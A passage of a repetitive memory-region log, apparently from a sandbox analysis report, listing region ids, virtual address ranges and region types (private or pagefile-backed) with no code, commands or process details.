0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12935 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12936 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12937 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12938 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12939 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12940 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12941 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12942 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12943 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12944 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12945 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12946 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12947 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12948 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12949 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12950 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12951 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12952 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12953 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12954 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12955 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12956 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12957 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12958 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12959 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12960 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12961 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12962 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12963 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12964 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12965 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12966 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12967 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12968 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12969 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12970 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12971 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12972 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12973 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12974 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12975 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12976 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12977 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12978 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12979 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12980 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12981 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12982 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12983 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12984 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12985 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12986 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12987 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12988 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12989 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12990 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12991 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12992 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12993 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12994 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12995 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12996 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12997 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12998 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12999 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13000 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13001 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13002 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13003 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13004 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13005 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13006 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13007 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13008 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13009 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13010 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13011 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13012 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13013 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13014 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13015 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13016 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13017 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13018 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13019 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13020 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13021 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13022 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13023 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13024 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13025 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13026 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13027 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13028 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13029 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13030 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13031 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13032 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13033 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13034 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13035 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13036 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13037 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13038 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13039 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13040 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13041 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13042 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13043 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13044 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13045 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13046 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13047 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13048 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13049 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13050 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13051 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13052 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13053 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13054 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13055 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13056 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13057 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13058 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13059 start_va = 0x590000 end_va = 0x592fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13060 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13061 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13062 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13063 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13064 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13065 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13066 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13068 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13069 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13070 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13071 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13073 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13074 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13075 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13076 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13079 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13080 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13081 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13082 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13083 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13084 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13085 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13086 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13087 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13088 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13089 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13090 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13093 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13094 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13095 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13097 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13101 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13103 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13104 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13105 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13111 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13112 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13113 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13117 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13124 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13125 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13126 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13127 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13136 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13137 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13139 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13140 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13141 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13142 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13143 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13144 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13145 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13146 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13147 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13148 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13157 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13158 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13159 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13160 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13161 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13162 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13171 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13172 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13173 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13174 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13175 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13176 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13177 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13178 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13179 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13180 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13181 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13182 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 